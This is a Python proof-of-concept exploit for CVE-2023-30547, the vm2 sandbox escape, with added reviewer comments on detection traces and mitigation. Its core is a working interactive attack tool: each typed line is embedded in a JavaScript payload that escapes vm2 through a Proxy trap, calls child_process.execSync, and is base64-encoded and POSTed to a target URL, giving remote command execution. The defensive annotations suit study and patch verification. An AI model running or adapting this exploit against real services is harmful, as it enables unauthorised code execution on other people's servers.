exploit.py
#!/bin/python3
import requests
import base64
import sys
import cmd
import readline
import json
# CVE-2023-30547 - PoC Exploit for VM2 Sandbox Escape Vulnerability
# Author : Ravindu Wickramasinghe | rvz
class ExploitShell(cmd.Cmd):
    """Interactive prompt for the CVE-2023-30547 (vm2 sandbox escape) PoC.

    Every line typed at the prompt that is not a ``do_*`` command is embedded
    in a JavaScript program, base64-encoded and POSTed as JSON to ``self.url``.
    NOTE(review): presumably the endpoint decodes the ``code`` field and runs
    it under Node.js with vm2 available; that side is not shown in this file.

    Review notes for defenders, taken from what this client sends:
    - The request body is a JSON object with the single key ``code`` holding
      base64 text; decoded, it is a script that loads ``vm2``, throws a
      ``Proxy`` with a ``getPrototypeOf`` handler, and reaches
      ``child_process.execSync`` through ``process.mainModule.require``.
      Those strings in a decoded request body, or a Node.js service process
      spawning a child shell, are the observable traces.
    - The User-Agent is a fixed Firefox 115 string; it is trivially changed,
      so treat it as a weak indicator only.
    - Mitigation is on the server: run a vm2 release that contains the fix
      for this CVE (see the project's advisory), and do not make an
      in-process JavaScript sandbox the only boundary around untrusted code.
    """

    def __init__(self, url):
        """Initialise the ``cmd.Cmd`` base class and remember the target URL."""
        super().__init__()
        self.url = url

    def default(self, line):
        """Wrap ``line`` in the JavaScript payload, POST it, print the reply.

        ``cmd.Cmd`` calls this for any input line that has no matching
        ``do_*`` method. Nothing is returned, so the prompt keeps running.
        """
        # NOTE: this local name shadows the imported ``cmd`` module for the
        # rest of the method.
        cmd = line
        # ``cmd`` is concatenated, unescaped, into a double-quoted JavaScript
        # string that itself sits inside a template literal. Input containing
        # a double quote, backtick or backslash therefore alters the generated
        # script instead of being passed through literally.
        #
        # What the inner script does, as written: it throws a Proxy whose
        # ``getPrototypeOf`` trap recurses without bound, destructures
        # ``constructor`` from whatever the ``catch`` receives, and uses
        # ``c.constructor('return process')()`` to obtain ``process`` and call
        # ``execSync(cmd)``. NOTE(review): the caught value is presumably a
        # host-side error that vm2 failed to sanitise; confirm against the
        # CVE advisory.
        payload = '''const {VM} = require("vm2");
const vm = new VM();
const code = `
cmd = "'''+cmd+'''";
err = {};
const handler = {
getPrototypeOf(target) {
(function stack() {
new Error().stack;
stack();
})();
}
};
const proxiedErr = new Proxy(err, handler);
try {
throw proxiedErr;
} catch ({constructor: c}) {
c.constructor('return process')().mainModule.require('child_process').execSync(cmd);
}
`
console.log(vm.run(code));'''
        # The endpoint is sent base64 text rather than raw JavaScript.
        encoded_payload = base64.b64encode(payload.encode('utf-8')).decode('utf-8')
        # update if needed
        headers = {
            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0',
            'Accept': '*/*',
            'Accept-Language': 'en-US,en;q=0.5',
            'Content-Type': 'application/json',
            'Connection': 'keep-alive',
        }
        # update if needed
        json_data = {'code': encoded_payload}
        try:
            # No ``timeout`` is passed, so an unresponsive server blocks the
            # prompt indefinitely.
            response = requests.post(self.url, headers=headers, json=json_data)
        except:
            # Bare ``except`` also swallows KeyboardInterrupt and SystemExit,
            # and the underlying error is not shown to the user.
            print("[!] an error occurred!")
            return
        try:
            # Prints the first value of the JSON object in the reply. Only
            # JSONDecodeError is handled: a JSON reply that is not an object,
            # or an empty object, raises out of this method.
            values = list(json.loads(response.text).values())
            print(values[0])
        except json.JSONDecodeError:
            # Non-JSON reply: show the raw body instead.
            print(response.text)

    def do_exit(self, args):
        """Handle the ``exit`` command; the true return value ends ``cmdloop``."""
        print("exiting...")
        return True
def main():
    """Read the target URL from the command line and start the prompt.

    Prints a usage line and exits with status 1 when no URL argument is
    given; otherwise runs the ``ExploitShell`` command loop with a ``> ``
    prompt until the user exits.
    """
    # A missing first argument is the only usage error that is checked.
    if len(sys.argv) < 2:
        print("usage: ./exploit.py <url>")
        sys.exit(1)
    console = ExploitShell(sys.argv[1])
    console.prompt = "> "
    console.cmdloop()
# Start the prompt only when the file is executed as a script, not on import.
if __name__ == "__main__":
    main()